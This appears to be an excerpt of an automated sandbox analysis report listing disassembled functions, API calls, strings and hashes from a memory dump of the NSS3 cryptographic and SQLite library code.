9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA13022, 6CA13156, 6CA13162, 6CA1318A, 6CA13196, 6CA131A2, 6CA131AE, 6CA131BA, 6CA131C6
%s at line %d of [%.10s], xrefs: 6CA13171
database corruption, xrefs: 6CA1316C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: b96deb2f0b4f139d39f361cbc47c2ca07b73fa51dbce891c8928cebfb925af8d
Instruction ID: 1f095c221da71baf7ea3ad254d878fa60f7d4c44cce0e528688e56a14924deb7
Opcode Fuzzy Hash: b96deb2f0b4f139d39f361cbc47c2ca07b73fa51dbce891c8928cebfb925af8d
Instruction Fuzzy Hash: D8B1A2B4E0A2199BCF08CF9DC884AEEB7B1BF48314F244029E445B7B41D774A981CBA4

Function 6CA8FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CA8FCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CA8FCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CA8FCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA8FD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CA8FD46
PORT_Alloc_Util.NSS3(00000001), ref: 6CA8FD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CA8FD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA8FD84

Strings

:, xrefs: 6CA8FD78

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: 6368776fb430ede5ce2bc58c9b705120326271b1d6e14be396906eb49a74c235
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: 4531E8B6E022565BEB008BA4DC057AF77A8EF5431CF190139DE14A7B00E771EA58C7D2

Function 6CAA6C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6CAA6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA6CA3

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CAA6CD5

Strings

C_DigestInit, xrefs: 6CAA6C61
hSession = 0x%x, xrefs: 6CAA6C7E, 6CAA6C8E
pMechanism = 0x%p, xrefs: 6CAA6CD0
(CK_INVALID_HANDLE), xrefs: 6CAA6C9C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: 025eb370498d5fc5e60ef70d22e83cdd1f82e9e1cb3fd332ca7fecb936c77a17
Instruction ID: 427d521d55a8719c38e482888a9c9a209131a4df6414ff51ed1e6c4b4a666793
Opcode Fuzzy Hash: 025eb370498d5fc5e60ef70d22e83cdd1f82e9e1cb3fd332ca7fecb936c77a17
Instruction Fuzzy Hash: 02212B34601194BBDB009F98ED58F9E77B5EB47318F484029E80997B01DB34AC8DCB92

Function 6CAA9DD0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SessionCancel), ref: 6CAA9DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA9E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA9E33

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA9E49
PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6CAA9E65

Strings

hSession = 0x%x, xrefs: 6CAA9E0E, 6CAA9E1E
C_SessionCancel, xrefs: 6CAA9DF1
flags = 0x%x, xrefs: 6CAA9E60
(CK_INVALID_HANDLE), xrefs: 6CAA9E2C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
API String ID: 1003633598-1678415578
Opcode ID: b899df510175b5e4dc8f6b0ef5136b3fb95c09ea8be1f009dbf9d948d9e17ac0
Instruction ID: d4cadc3b622ad90d2acc77f963f5d898df0500a2c9fc35dcdf66b9f95b530beb
Opcode Fuzzy Hash: b899df510175b5e4dc8f6b0ef5136b3fb95c09ea8be1f009dbf9d948d9e17ac0
Instruction Fuzzy Hash: A3216E74602294AFDB109FA4DE98F6E77B9EB4631CF044025E90997B02DB35ACCDC792

Function 6CA70F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CA70F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA70F84

Part of subcall function 6CACB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBA18D0,?), ref: 6CACB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6CA8F59B,6CB9890C,?), ref: 6CA70FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6CA70FC1

Part of subcall function 6CAD0BE0: malloc.MOZGLUE(6CAC8D2D,?,00000000,?), ref: 6CAD0BF8
Part of subcall function 6CAD0BE0: TlsGetValue.KERNEL32(6CAC8D2D,?,00000000,?), ref: 6CAD0C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6CA70FDB
PR_CallOnce.NSS3(6CBD2AA4,6CAD12D0), ref: 6CA70FEF
PL_FreeArenaPool.NSS3(?), ref: 6CA71001
PL_FinishArenaPool.NSS3(?), ref: 6CA71009

Strings

security, xrefs: 6CA70F5C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: 07f4202774f2bf73bb3ff455da1bcf3f9959219ca949fac2a82f7caa0978fbe6
Instruction ID: 5bdc21cecd0a6ce5d6e0210e65aca17c6177cbc20f5174f1b49b80a69b51bd9d
Opcode Fuzzy Hash: 07f4202774f2bf73bb3ff455da1bcf3f9959219ca949fac2a82f7caa0978fbe6
Instruction Fuzzy Hash: 4D2136B5904344ABE7109F28DD41AAE77B8EF45258F048528FC1897701F732E989CBE2

Function 6CA76DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6CA77D8F,6CA77D8F,?,?), ref: 6CA76DC8

Part of subcall function 6CACFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CACFE08
Part of subcall function 6CACFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CACFE1D
Part of subcall function 6CACFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CACFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CA77D8F,?,?), ref: 6CA76DD5

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB98FA0,00000000,?,?,?,?,6CA77D8F,?,?), ref: 6CA76DF7

Part of subcall function 6CACB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBA18D0,?), ref: 6CACB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA76E35

Part of subcall function 6CACFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CACFE29
Part of subcall function 6CACFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CACFE3D
Part of subcall function 6CACFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CACFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CA76E4C

Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB98FE0,00000000), ref: 6CA76E82

Part of subcall function 6CA76AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CA7B21D,00000000,00000000,6CA7B219,?,6CA76BFB,00000000,?,00000000,00000000,?,?,?,6CA7B21D), ref: 6CA76B01
Part of subcall function 6CA76AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CA76B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA76F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CA76F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CB98FE0,00000000), ref: 6CA76F6B
PR_SetError.NSS3(FFFFE005,00000000,6CA77D8F,?,?), ref: 6CA76FE1

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 1f3593a4eea396b66f3e487b1a3839deab0c58f48ef77bcc2fee322aed67abb9
Instruction ID: 31abe8cda7d3c3ebf4272999cc1eed043e3023277e538bcd28dcbf144fa1f163
Opcode Fuzzy Hash: 1f3593a4eea396b66f3e487b1a3839deab0c58f48ef77bcc2fee322aed67abb9
Instruction Fuzzy Hash: EE717075E106469BDB10CF55CD40BAABBB4BF55308F194229E808D7B11F771EAD8CBA0

Function 6CAB0FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAB1057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAB1085
PK11_GetAllTokens.NSS3 ref: 6CAB10B1
free.MOZGLUE(?), ref: 6CAB1107
PR_SetError.NSS3(00000000,00000000), ref: 6CAB1172
free.MOZGLUE(?), ref: 6CAB1182
free.MOZGLUE(?), ref: 6CAB11A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6CAB11C5

Part of subcall function 6CAB52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6CA8EAC5,00000001), ref: 6CAB52DF
Part of subcall function 6CAB52C0: EnterCriticalSection.KERNEL32(?), ref: 6CAB52F3
Part of subcall function 6CAB52C0: PR_Unlock.NSS3(?), ref: 6CAB5358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CAB11D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CAB11F3

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: 23b7073816fbd6fcdb7c714ea017df6ed9923f40a7522ff408d3bfe3ee7cc093
Instruction ID: 57e3b398b50d49ebad1ba9a4668c142f8dcb688ab72321e7e24e4cfd188247df
Opcode Fuzzy Hash: 23b7073816fbd6fcdb7c714ea017df6ed9923f40a7522ff408d3bfe3ee7cc093
Instruction Fuzzy Hash: 8B6183B4E013459BEB00DF64D945BAEBBB9AF04348F184128EE1DBB741E731E985CB91

Function 6CABADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE10
EnterCriticalSection.KERNEL32(?,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6CA9D079,00000000,00000001), ref: 6CABAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE7F
TlsGetValue.KERNEL32(?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAEF1
free.MOZGLUE(6CA9CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA9CDBB,?), ref: 6CABAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAF30

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 7013271ea36d60d5c0d2fa787439ac1e2d6c0593e2f9ced73df7332e67ad0fd4
Instruction ID: e6147813523eefc543915c1349d847fde0b7519b05760fd09dd8b1443711a277
Opcode Fuzzy Hash: 7013271ea36d60d5c0d2fa787439ac1e2d6c0593e2f9ced73df7332e67ad0fd4
Instruction Fuzzy Hash: 35519FB5A00611AFDB01DF29D884B5AB7B9FF08318F184264E818A7E11E731FDA4CBD1

Function 6CA94CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA9AB7F,?,00000000,?), ref: 6CA94CB4
EnterCriticalSection.KERNEL32(0000001C,?,6CA9AB7F,?,00000000,?), ref: 6CA94CC8
TlsGetValue.KERNEL32(?,6CA9AB7F,?,00000000,?), ref: 6CA94CE0
EnterCriticalSection.KERNEL32(?,?,6CA9AB7F,?,00000000,?), ref: 6CA94CF4
PL_HashTableLookup.NSS3(?,?,?,6CA9AB7F,?,00000000,?), ref: 6CA94D03
PR_Unlock.NSS3(?,00000000,?), ref: 6CA94D10

Part of subcall function 6CB1DD70: TlsGetValue.KERNEL32 ref: 6CB1DD8C
Part of subcall function 6CB1DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB1DDB4

PR_Now.NSS3(?,00000000,?), ref: 6CA94D26

Part of subcall function 6CB39DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB80A27), ref: 6CB39DC6
Part of subcall function 6CB39DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB80A27), ref: 6CB39DD1
Part of subcall function 6CB39DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB39DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6CA94D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CA94DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CA94E02

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 67303e567752e0b72889b48646e2a8f4ca05eb8341f1ecf43bbaf926405b2ff8
Instruction ID: ec89a7179968421fae48bc1d72355ccce3bc7c8044296b5288b3cdc1353a1097
Opcode Fuzzy Hash: 67303e567752e0b72889b48646e2a8f4ca05eb8341f1ecf43bbaf926405b2ff8
Instruction Fuzzy Hash: B941C8B9A102159BEB015F74ED45A5A77F8EF0521CF084170EC2987B21EB31D998C7E1

Function 6CA72E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA72CDA,?,00000000), ref: 6CA72E1E

Part of subcall function 6CACFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CA79003,?), ref: 6CACFD91
Part of subcall function 6CACFD80: PORT_Alloc_Util.NSS3(A4686CAD,?), ref: 6CACFDA2
Part of subcall function 6CACFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CAD,?,?), ref: 6CACFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6CA72E33

Part of subcall function 6CACFD80: free.MOZGLUE(00000000,?,?), ref: 6CACFDD1

TlsGetValue.KERNEL32 ref: 6CA72E4E
EnterCriticalSection.KERNEL32(?), ref: 6CA72E5E
PL_HashTableLookup.NSS3(?), ref: 6CA72E71
PL_HashTableRemove.NSS3(?), ref: 6CA72E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6CA72E96
PR_Unlock.NSS3 ref: 6CA72EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA72EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA72EC5

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 2a74d19bbff97bffe6ba46b74433e360e8db22fc1e70855880f6278238436607
Instruction ID: bc13503dfa09661c34a1391b7389c33eeb4c3e781a46a1f024d0c8df6cbf9bd9
Opcode Fuzzy Hash: 2a74d19bbff97bffe6ba46b74433e360e8db22fc1e70855880f6278238436607
Instruction Fuzzy Hash: C421C276A40141A7EF111F65AC09E9A3A79EB5235DF080134ED1887B11FB32D9E8D6E2

Function 6CA5FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CA5FD18
sqlite3_initialize.NSS3 ref: 6CA5FD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CA5FD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6CA5FD99
sqlite3_free.NSS3(00000000), ref: 6CA5FE3C
sqlite3_free.NSS3(?), ref: 6CA5FEE3
sqlite3_free.NSS3(?), ref: 6CA5FEEE

Strings

simple, xrefs: 6CA5FC79

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: 78c23b4928a85b4581c4b7cf55ecb73937b49a161f6fd33b54e2ec3d7ea29764
Instruction ID: 4c40ef37f0a5ddc3da5d263376c91d3240e86c943b0ee5485f0f784f9e547939
Opcode Fuzzy Hash: 78c23b4928a85b4581c4b7cf55ecb73937b49a161f6fd33b54e2ec3d7ea29764
Instruction Fuzzy Hash: D5915FB1A012058FDB04CF55CC80AAAB7B1FF85318F69C56DDC199BB52E731E8A5CB90

Function 6CA65CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CA65EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA65EED

Strings

misuse, xrefs: 6CA65EDB
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA65ED1
